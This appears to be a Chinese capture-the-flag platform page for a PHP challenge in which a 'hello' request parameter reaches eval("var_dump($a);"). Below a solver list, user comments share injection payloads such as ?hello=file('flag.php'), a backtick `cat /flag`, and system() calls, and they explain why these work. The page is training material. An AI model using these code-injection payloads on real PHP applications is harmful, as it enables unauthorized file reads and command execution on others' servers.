评分(10)
解题动态
uiu 攻破了该题 6小时前
Rencj 攻破了该题 9小时前
无情的白给机器人 攻破了该题 10小时前
大奇 攻破了该题 11小时前
神逆流·神里绫华 攻破了该题 14小时前
小鱼板板 攻破了该题 14小时前
kiritoldws 攻破了该题 15小时前
chenzhong 攻破了该题 1天前
gusto. 攻破了该题 1天前
z2l1 攻破了该题 1天前
多斯Nico 攻破了该题 1天前
13522765614 攻破了该题 1天前
等往事风中吹‘ 攻破了该题 2天前
evilk 攻破了该题 2天前
kim66 攻破了该题 2天前
flag大王 攻破了该题 2天前
66744565 攻破了该题 2天前
3373441596 攻破了该题 2天前
pengyu 攻破了该题 2天前
评论
SecI302 3年前
举报
踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容
Cat00011cat 3年前
举报
http://114.67.175.224:10794/?hello=file(%27flag.php%27)
musewithwind 3年前
举报
@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了
D4C 3年前
举报
大佬能不能给小白讲讲原理啊
小王爱吃螺蛳粉 3年前
举报
有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来
风灵丨玉秀 3年前
举报
/?hello="flag.php"
cattact 3年前
举报
知识点: 1.$a= @$_REQUEST['hello']Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 2.eval("var_dump($a);")就是把$a的内容打印出来 3.file()解释: file(path,include_path,context) 将文件作为一个数组返回。数组中的每个单元都是文件中相应的一行,包括换
solomony 3年前
举报
?hello=`cat /flag`
karter 3年前
举报
@sxiaobai system函数里的东西要加引号
sxiaobai 3年前
举报
为什么?hello=system(cat /flag)不行啊
布吉岛 3年前
举报
直接给hello复制传到a上,然后页面会将a的信息显示出来。 ?hello=file('flag.php')
bugkiller 3年前
举报
var_dump()方法,判断一个变量的类型与长度,并输出变量的数值,如果变量有值,则输出是变量的值,并返回数据类型。 eval() 函数把字符串按照 PHP 代码来计算。 echo __FILE__ ; // 取得当前文件的绝对地址,结果:D:\www\test.php show_source() 函数对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮。
EE0011 3年前
举报
cat:输出,正序 tac:输出,反序
Timeover 3年前
举报
$flag = 'Too Young Too Simple' hhh